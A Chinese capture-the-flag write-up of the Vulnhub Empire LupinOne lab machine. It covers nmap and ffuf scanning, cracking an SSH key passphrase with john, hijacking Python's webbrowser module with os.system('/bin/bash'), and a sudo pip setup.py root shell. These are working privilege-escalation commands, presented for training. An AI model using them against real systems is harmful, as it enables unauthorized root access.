Vulnhub-Empire靶机-详细打靶流程

渗透思路

    • 1.确认靶机IP地址
    • 2.端口服务扫描
    • 3.敏感目录扫描
    • 4.ffuf命令
      • 在这个目录下,继续使用ffuf工具扫描
    • 5.ssh私钥爆破
      • 1.将私钥写进sh.txt中
      • 2.将私钥转换为可以被john爆破的形式
      • 3.通过John爆破
    • 6.ssh私钥登陆
    • 7.icex64提权
    • 8.arsene提权

1.确认靶机IP地址

┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:10:3c:9b, IPv4: 192.168.0.130
Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.0.1     b8:3a:08:3b:f9:30       Tenda Technology Co.,Ltd.Dongguan branch
192.168.0.133   00:0c:29:a5:34:7f       VMware, Inc.
192.168.0.139   7c:b5:66:a5:f0:a5       Intel Corporate

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.8: 256 hosts scanned in 2.035 seconds (125.80 hosts/sec). 3 responded

┌──(root㉿kali)-[~]
└─# nmap -Pn 192.168.0.0/24 --min-rate 10000
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-07 03:18 EST
Nmap scan report for 192.168.0.1 (192.168.0.1)
Host is up (0.011s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: B8:3A:08:3B:F9:30 (Tenda Technology,Ltd.Dongguan branch)

Nmap scan report for chronos.local (192.168.0.133)
Host is up (0.00056s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:A5:34:7F (VMware)

Nmap scan report for 192.168.0.139 (192.168.0.139)
Host is up (0.00024s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 7C:B5:66:A5:F0:A5 (Intel Corporate)

Nmap scan report for 192.168.0.130 (192.168.0.130)
Host is up (0.000077s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh

Nmap done: 256 IP addresses (4 hosts up) scanned in 1.38 seconds

靶机IP地址为192.168.0.133

2.端口服务扫描

┌──(root㉿kali)-[~]
└─# nmap -A 192.168.0.133 --min-rate 10000  
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-07 03:20 EST
Nmap scan report for chronos.local (192.168.0.133)
Host is up (0.0012s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   3072 edead9d3af199c8e4e0f31dbf25d1279 (RSA)
|   256 bf9fa993c58721a36b6f9ee68761f519 (ECDSA)
|_  256 ac18eccc35c051f56f4774c30195b40f (ED25519)
80/tcp open  http    Apache httpd 2.4.48 ((Debian))
|_http-server-header: Apache/2.4.48 (Debian)
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 1 disallowed entry 
|_/~myfiles
MAC Address: 00:0C:29:A5:34:7F (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.22 ms chronos.local (192.168.0.133)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.64 seconds

┌──(root㉿kali)-[~]
└─# nmap -sC -sV -p 22,80 192.168.0.133      
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-07 03:20 EST
Nmap scan report for chronos.local (192.168.0.133)
Host is up (0.00055s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   3072 edead9d3af199c8e4e0f31dbf25d1279 (RSA)
|   256 bf9fa993c58721a36b6f9ee68761f519 (ECDSA)
|_  256 ac18eccc35c051f56f4774c30195b40f (ED25519)
80/tcp open  http    Apache httpd 2.4.48 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_/~myfiles
|_http-server-header: Apache/2.4.48 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:A5:34:7F (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.85 seconds

3.敏感目录扫描

┌──(root㉿kali)-[~]
└─# dirsearch -u "http://192.168.0.133"

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                                                    
 (_||| _) (/_(_|| (_| )                                                                                                                                                             
                                                                                                                                                                                    
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/http_192.168.0.133/_24-02-07_03-21-59.txt

Target: http://192.168.0.133/

[03:21:59] Starting:                                                                                                                                                                
[03:22:02] 403 -  278B  - /.ht_wsr.txt                                      
[03:22:02] 403 -  278B  - /.htaccess.sample                                 
[03:22:02] 403 -  278B  - /.htaccess_extra                                  
[03:22:02] 403 -  278B  - /.htaccess.orig                                   
[03:22:02] 403 -  278B  - /.htaccess.bak1                                   
[03:22:02] 403 -  278B  - /.htaccessOLD                                     
[03:22:02] 403 -  278B  - /.htaccess_orig                                   
[03:22:02] 403 -  278B  - /.html                                            
[03:22:02] 403 -  278B  - /.htaccessBAK
[03:22:02] 403 -  278B  - /.htpasswd_test                                   
[03:22:02] 403 -  278B  - /.htaccess.save
[03:22:02] 403 -  278B  - /.htaccessOLD2                                    
[03:22:02] 403 -  278B  - /.htaccess_sc                                     
[03:22:02] 403 -  278B  - /.htpasswds                                       
[03:22:02] 403 -  278B  - /.httr-oauth
[03:22:02] 403 -  278B  - /.htm                                             
[03:22:36] 301 -  314B  - /image  ->  http://192.168.0.133/image/           
[03:22:38] 301 -  319B  - /javascript  ->  http://192.168.0.133/javascript/ 
[03:22:42] 301 -  315B  - /manual  ->  http://192.168.0.133/manual/         
[03:22:42] 200 -  208B  - /manual/index.html                                
[03:22:55] 200 -   34B  - /robots.txt                                       
[03:22:56] 403 -  278B  - /server-status/                                   
[03:22:56] 403 -  278B  - /server-status                                    
                                                                             
Task Completed
扫出robots.txt ,访问~myfiles目录,没有什么东西,这里通过其他的目录扫描工具,也没有扫到有用的信息

在这里插入图片描述访问~myfiles
在这里插入图片描述

4.ffuf命令

ffuf是一个用于Web应用程序的模糊测试工具,它可以快速、灵活地查找隐藏的内容、目录或文件

-u:url
-x:输出高亮
-r:遵循重定向
-w: 字典
┌──(root㉿kali)-[~]
└─# ffuf -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u "http://192.168.0.133/~FUZZ"                        

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.5.0 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.0.133/~FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

secret                  [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 36ms]

扫到secret目录,访问
在这里插入图片描述

你好朋友,我很高兴你找到了我的秘密目录,我创建了这样的与你分享我的创建SSH私钥文件, 它隐藏在这里的某个地方,这样黑客就不会找到它,也不会用快速通道破解我的密码。 我很聪明我知道。 有什么问题就告诉我 你最好的朋友icex64 

告诉你要找到ssh密钥,且他的名字是icex64

在这个目录下,继续使用ffuf工具扫描

.mysecret.txt

┌──(root㉿kali)-[~]
└─# ffuf -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u "http://192.168.0.133/~secret/.FUZZ" -e .txt,.bak,.html,.pub -mc 200

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.5.0 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.0.133/~secret/.FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
 :: Extensions       : .txt .bak .html .pub 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200
________________________________________________

# directory-list-2.3-small.txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 4ms]
#.bak                   [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 7ms]
# or send a letter to Creative Commons, 171 Second Street, .pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 7ms]
#.html                  [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 8ms]
#.bak                   [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 8ms]
#                       [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 7ms]
#.txt                   [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 7ms]
# Copyright 2007 James Fisher.txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 12ms]
# Copyright 2007 James Fisher [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 12ms]
#.pub                   [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 12ms]
# Attribution-Share Alike 3.0 License. To view a copy of this .bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 13ms]
#.pub                   [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 13ms]
#.html                  [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 14ms]
# Attribution-Share Alike 3.0 License. To view a copy of this .pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 14ms]
# Attribution-Share Alike 3.0 License. To view a copy of this .txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 14ms]
# or send a letter to Creative Commons, 171 Second Street,  [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 13ms]
# Attribution-Share Alike 3.0 License. To view a copy of this  [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 15ms]
# or send a letter to Creative Commons, 171 Second Street, .bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 20ms]
#.txt                   [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 21ms]
#                       [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 12ms]
#.txt                   [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 13ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ .txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 21ms]
#.bak                   [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 13ms]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 18ms]
#.pub                   [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 14ms]
# or send a letter to Creative Commons, 171 Second Street, .html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 19ms]
#.html                  [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 15ms]
#                       [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 35ms]
# This work is licensed under the Creative Commons .pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 35ms]
# directory-list-2.3-small.txt.pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 37ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ .html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 37ms]
# Attribution-Share Alike 3.0 License. To view a copy of this .html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 41ms]
# or send a letter to Creative Commons, 171 Second Street, .txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 39ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ .bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 39ms]
# directory-list-2.3-small.txt.bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 42ms]
# This work is licensed under the Creative Commons .html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 43ms]
# Copyright 2007 James Fisher.pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 43ms]
# Copyright 2007 James Fisher.bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 44ms]
# directory-list-2.3-small.txt.html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 45ms]
# This work is licensed under the Creative Commons .bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 45ms]
# This work is licensed under the Creative Commons .txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 46ms]
# directory-list-2.3-small.txt.txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 46ms]
# Copyright 2007 James Fisher.html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 48ms]
# This work is licensed under the Creative Commons  [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 48ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/  [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 50ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ .pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 51ms]
# on atleast 3 different hosts [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 40ms]
# on atleast 3 different hosts.txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 41ms]
# on atleast 3 different hosts.bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 38ms]
# Priority ordered case sensative list, where entries were found .pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 43ms]
# on atleast 3 different hosts.pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 39ms]
# on atleast 3 different hosts.html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 39ms]
#                       [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 39ms]
#.txt                   [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 39ms]
#.bak                   [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 39ms]
                        [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 38ms]
#.html                  [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 40ms]
#.pub                   [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 40ms]
                        [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 47ms]
mysecret.txt            [Status: 200, Size: 4689, Words: 1, Lines: 2, Duration: 56ms]
:: Progress: [438320/438320] :: Job [1/1] :: 938 req/sec :: Duration: [0:08:00] :: Errors: 0 ::

在这里插入图片描述
在这里插入图片描述

base58解码,是一个ssh私钥

5.ssh私钥爆破

1.将私钥写进sh.txt中

在这里插入图片描述

2.将私钥转换为可以被john爆破的形式

┌──(root㉿kali)-[~]
└─# /usr/bin/ssh2john sh.txt > hash

3.通过John爆破

这里我之前爆破过了

┌──(root㉿kali)-[~]
└─# john --wordlist=/usr/share/wordlists/fasttrack.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
No password hashes left to crack (see FAQ)
                                                                                                                                                                                    
┌──(root㉿kali)-[~]
└─# john --show hash                                       
sh.txt:P@55w0rd!

1 password hash cracked, 0 left

6.ssh私钥登陆

┌──(root㉿kali)-[~]
└─# ssh -i sh.txt icex64@192.168.0.133
Enter passphrase for key 'sh.txt': 
Linux LupinOne 5.10.0-8-amd64 #1 SMP Debian 5.10.46-5 (2021-09-23) x86_64
########################################
Welcome to Empire: Lupin One
########################################
Last login: Wed Feb  7 00:46:39 2024 from 192.168.0.130
icex64@LupinOne:~$ 

7.icex64提权

sudo -l
看到一个py文件,arsene用户可以在没有passwd的环境下,使用heist.py,就想到在py中新启动一个arsene,shell环境
icex64@LupinOne:~$ sudo -l
Matching Defaults entries for icex64 on LupinOne:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User icex64 may run the following commands on LupinOne:
    (arsene) NOPASSWD: /usr/bin/python3.9 /home/arsene/heist.py
icex64@LupinOne:~$ cat /home/arsene/heist.py 
import webbrowser

print ("Its not yet ready to get in action")

webbrowser.open("https://empirecybersecurity.co.mz")

heist.py文件中引用了webbrowser模块,找一下这个模块

import webbrowser

print ("Its not yet ready to get in action")

icex64@LupinOne:~$ find / -name webbrowser.py -type f 2>/dev/null
/usr/lib/python3.9/webbrowser.py
icex64@LupinOne:~$ head /usr/lib/python3.9/webbrowser.py 

#! /usr/bin/env python3
"""Interfaces for launching and remotely controlling Web browsers."""
# Maintained by Georg Brandl.

import os
import shlex
import shutil
import sys
import subprocess

看到模块中引用了,os模块,想到通过os.system("/bin/bash"),新启一个shell,将os.system("/bin/bash")加入到webbrowser.py中
使用vi编辑器
icex64@LupinOne:/tmp$ head -n 20 /usr/lib/python3.9/webbrowser.py 

#! /usr/bin/env python3
"""Interfaces for launching and remotely controlling Web browsers."""
# Maintained by Georg Brandl.

import os
import shlex
import shutil
import sys
import subprocess
import threading

os.system("/bin/bash")
__all__ = ["Error", "open", "open_new", "open_new_tab", "get", "register"]

加入完成后运行

icex64@LupinOne:/tmp$ sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py
arsene@LupinOne:/tmp$ id
uid=1000(arsene) gid=1000(arsene) groups=1000(arsene),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

成功到arsene用户

8.arsene提权

pip提权
https://gtfobins.github.io/gtfobins/pip/

arsene@LupinOne:/tmp$ sudo -l
Matching Defaults entries for arsene on LupinOne:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User arsene may run the following commands on LupinOne:
    (root) NOPASSWD: /usr/bin/pip
arsene@LupinOne:/tmp$ TF=$(mktemp -d)
arsene@LupinOne:/tmp$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
arsene@LupinOne:/tmp$ sudo pip install $TF
Processing ./tmp.heBquagVzj
# id
uid=0(root) gid=0(root) groups=0(root)
# ls  
setup.py
# cd /root
# ls
root.txt
# cat root.txt
*,,,,,,,,,,,,,,,,,,,,,,,,,,,,,(((((((((((((((((((((,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,                       .&&&&&&&&&(            /&&&&&&&&&                       
,                    &&&&&&*                          @&&&&&&                   
,                *&&&&&                                   &&&&&&                
,              &&&&&                                         &&&&&.             
,            &&&&                   ./#%@@&#,                   &&&&*           
,          &%&&          &&&&&&&&&&&**,**/&&(&&&&&&&&             &&&&          
,        &@(&        &&&&&&&&&&&&&&&.....,&&*&&&&&&&&&&             &&&&        
,      .& &          &&&&&&&&&&&&&&&      &&.&&&&&&&&&&               &%&       
,     @& &           &&&&&&&&&&&&&&&      && &&&&&&&&&&                @&&&     
,    &%((            &&&&&&&&&&&&&&&      && &&&&&&&&&&                 #&&&    
,   &#/*             &&&&&&&&&&&&&&&      && #&&&&&&&&&(                 (&&&   
,  %@ &              &&&&&&&&&&&&&&&      && ,&&&&&&&&&&                  /*&/  
,  & &               &&&&&&&&&&&&&&&      &&* &&&&&&&&&&                   & &  
, & &                &&&&&&&&&&&&&&&,     &&& &&&&&&&&&&(                   &,@ 
,.& #                #&&&&&&&&&&&&&&(     &&&.&&&&&&&&&&&                   & & 
*& &                 ,&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&             &(&
*& &                 ,&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&            & &
*& *              &&&&&&&&&&&&&&&&&&&@.                 &&&&&&&&             @ &
*&              &&&&&&&&&&&&&&&&&&@    &&&&&/          &&&&&&                & &
*% .           &&&&&&&&&&&@&&&&&&&   &  &&(  #&&&&   &&&&.                   % &
*& *            &&&&&&&&&&   /*      @%&%&&&&&&&&    &&&&,                   @ &
*& &               &&&&&&&           & &&&&&&&&&&     @&&&                   & &
*& &                    &&&&&        /   /&&&&         &&&                   & @
*/(,                      &&                            &                   / &.
* & &                     &&&       #             &&&&&&      @             & &.
* .% &                    &&&%&     &    @&&&&&&&&&.   %@&&*               ( @, 
/  & %                   .&&&&  &@ @                 &/                    @ &  
*   & @                  &&&&&&    &&.               ,                    & &   
*    & &               &&&&&&&&&& &    &&&(          &                   & &    
,     & %           &&&&&&&&&&&&&&&(       .&&&&&&&  &                  & &     
,      & .. &&&&&&&&&&&&&&&&&&&&&&&&&&&&*          &  &                & &      
,       #& & &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&        &.             %  &       
,         &  , &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&.     &&&&          @ &*        
,           & ,, &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&.  /&&&&&&&&    & &@          
,             &  & #&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&  &&&&&&&@ &. &&            
,               && /# /&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&# &&&# &# #&               
,                  &&  &( .&&&&&&&&&&&&&&&&&&&&&&&&&&&  &&  &&                  
/                     ,&&(  &&%   *&&&&&&&&&&%   .&&&  /&&,                     
,                           &&&&&/...         .#&&&&#                           

3mp!r3{congratulations_you_manage_to_pwn_the_lupin1_box}
See you on the next heist.

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/377513.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

【WebSocket】微信小程序原生组件使用SocketTask 调用星火认知大模型

直接上代码 微信开发者工具-调试器-终端-新建终端 进行依赖安装 npm install base-64 npm install crypto-js 然后顶部工具栏依次点击 工具-构建npm // index.js const defaultAvatarUrl https://mmbiz.qpic.cn/mmbiz/icTdbqWNOwNRna42FI242Lcia07jQodd2FJGIYQfG0LAJGFxM4FbnQ…

android studio下开发flutter

文章目录 1. 配置环境 https://flutter.cn/docs/get-started/install2. android studio下开发flutter 1. 配置环境 https://flutter.cn/docs/get-started/install 2. android studio下开发flutter 打开Android Studio -> File -> Settings -> Plugins 搜索Dart插件 …

Golang 基础 Go Modules包管理

Golang 基础 Go Modules包管理 在 Go 项目开发中&#xff0c;依赖包管理是一个非常重要的内容&#xff0c;依赖包处理不好&#xff0c;就会导致编译失败&#xff0c;本文将系统介绍下 Go 的依赖包管理工具。 我会首先介绍下 Go 依赖包管理工具的历史&#xff0c;并详细介绍下…

第4章——深度学习入门(鱼书)

第4章 神经网络的学习 本章的主题是神经网络的学习。这里所说的“学习”是指从训练数据中自动获取最优权重参数的过程。本章中&#xff0c;为了使神经网络能进行学习&#xff0c;将导入损失函数这一指标。而学习的目的就是以该损失函数为基准&#xff0c;找出能使它的值达到最…

(力扣)1314.矩阵区域和

给你一个 m x n 的矩阵 mat 和一个整数 k &#xff0c;请你返回一个矩阵 answer &#xff0c;其中每个 answer[i][j] 是所有满足下述条件的元素 mat[r][c] 的和&#xff1a; i - k < r < i k, j - k < c < j k 且(r, c) 在矩阵内。 示例 1&#xff1a; 输入&a…

Visual Studio 2022中创建的C++项目无法使用万能头<bits/stdc++.h>解决方案

目录 发现问题 解决办法 第一步 第二步 第三步 第四步 最后一步 问题解决 发现问题 如果大家也遇到下面这种问题&#xff0c;可能是没有include文件夹中没有bits/stdc.h 解决办法 第一步 打开一个C项目&#xff0c;鼠标移动至头文件上右击&#xff0c;选择转到文档或…

Chrome 沙箱逃逸 -- Plaid CTF 2020 mojo

文章目录 前置知识参考文章环境搭建题目环境调试环境 题目分析附件分析漏洞分析OOBUAF 漏洞利用总结 前置知识 Mojo & Services 简介 chromium mojo 快速入门 Mojo docs Intro to Mojo & Services 译文&#xff1a;利用Mojo IPC的UAF漏洞实现Chrome浏览器沙箱逃逸原文…

训练集,验证集,测试集比例

三者的区别 训练集&#xff08;train set&#xff09; —— 用于模型拟合的数据样本。验证集&#xff08;validation set&#xff09;—— 是模型训练过程中单独留出的样本集&#xff0c;它可以用于调整模型的超参数和用于对模型的能力进行初步评估。 通常用来在模型迭代训练时…

SpringMVC原理(设计原理+启动原理+工作原理)

文章目录 前言正文一、设计原理1.1 servlet生命周期简述1.2 设计原理小结 二、启动原理2.1 AbstractHandlerMethodMapping 初始化 --RequestMapping注解解析2.2 DispatcherServlet 的初始化2.3 DispatcherServlet#initHandlerMappings(...) 初始化示例说明 三、工作原理 前言 …

Open CASCADE学习|创建多段线与圆

使用Open CASCADE Technology (OCCT)库来创建和显示一些2D几何形状。 主要过程如下&#xff1a; 包含头文件&#xff1a;代码首先包含了一些必要的头文件&#xff0c;这些头文件提供了创建和显示几何形状所需的类和函数。 定义变量&#xff1a;在main函数中&#xff0c;定义…

Linux下库函数、静态库与动态库

库函数 什么是库 库是二进制文件, 是源代码文件的另一种表现形式, 是加了密的源代码; 是一些功能相近或者是相似的函数的集合体. 使用库有什么好处 提高代码的可重用性, 而且还可以提高程序的健壮性;可以减少开发者的代码开发量, 缩短开发周期. 库制作完成后, 如何给用户…

2 月 7 日算法练习- 数据结构-树状数组

树状数组 lowbit 在学习树状数组之前&#xff0c;我们需要了解lowbit操作&#xff0c;这是一种位运算操作&#xff0c;用于计算出数字的二进制表达中的最低位的1以及后面所有的0。 写法很简单&#xff1a; int lowbit&#xff08;int x&#xff09;&#xff5b;return x &am…

C#,字符串相似度的莱文斯坦距离(Levenshtein Distance)算法与源代码

一、莱文斯坦&#xff08;Levenshtein&#xff09; Vladimir I. Levenshtein 弗拉基米尔I列文施坦博士是纠错码理论的先驱&#xff0c;被称为俄罗斯编码理论之父。Levenshtein是莫斯科俄罗斯科学院Keldysh应用数学研究所的研究教授&#xff0c;他的贡献体现在消费者的日常生活中…

SERVLET过滤器

SERVLET过滤器 全球因特网用户使用不同类型的Web浏览器访问应用服务器上存储的Web应用程序。每个浏览器根据对应的Web浏览器窗口中的设置显示应用程序中的信息。Web应用程序可能会有一些客户机的Web浏览器不支持的HTML标记或功能。这种情况下,应用程序在客户机的Web浏览器中可…

Pandas文本数据处理大全:类型判断、空白字符处理、拆分与连接【第67篇—python:文本数据】

文章目录 Pandas文本数据处理大全&#xff1a;类型判断、空白字符处理、拆分与连接1. 判断文本数据类型2. 去除空白字符3. 文本数据拆分4. 文本数据连接5. 文本数据替换6. 文本数据匹配与提取7. 文本数据的大小写转换8. 文本数据的长度计算9. 文本数据的排序10. 文本数据的分组…

Spring如何扫描自定义的注解?

目录 一、Spring框架介绍 二、什么是自定义注解 三、如何扫描自定义的注解 一、Spring框架介绍 Spring框架是一个开源的Java应用程序框架&#xff0c;它提供了一种全面的编程和配置模型&#xff0c;用于构建现代化的企业级应用程序。Spring框架的核心原则是依赖注入&#x…

Tkinter教程21:Listbox列表框+OptionMenu选项菜单+Combobox下拉列表框控件的使用+绑定事件

------------★Tkinter系列教程★------------ Tkinter教程21&#xff1a;Listbox列表框OptionMenu选项菜单Combobox下拉列表框控件的使用绑定事件 Tkinter教程20&#xff1a;treeview树视图组件&#xff0c;表格数据的插入与表头排序 Python教程57&#xff1a;tkinter中如何…

【数据库】索引的使用

【数据库】索引的使用 前言出发示例创建表Explain 查看sql执行计划where 查询解析无索引有索引 where oderBy 查询解析无索引有索引 总结 前言 在数据库设计过程中&#xff0c;常需要考虑性能&#xff0c;好的设计可以大大提高sql 语句的增删改查速度。在表的创建过程中&…

IEC 104电力规约详细解读(三) - 遥信

1.功能简述 遥信&#xff0c;、即状态量&#xff0c;是为了将断路器、隔离开关、中央信号等位置信号上送到监控后台的信息。遥信信息包括&#xff1a;反应电网运行拓扑方式的位置信息。如断路器状态、隔离开关状态&#xff1b;反应一次二次设备工作状况的运行信息&#xff0c;如…

OOD分类项目训练

一、项目地址 GitHub - LooKing9218/UIOS 二、label制作 将训练、验证、测试数据的分类信息转换入.csv文件中&#xff0c;运行如下脚本即可&#xff1a; import os import csv#要读取的训练、验证、测试文件的目录&#xff0c;该文件下保存着以各个类别命名的文件夹和对应的分…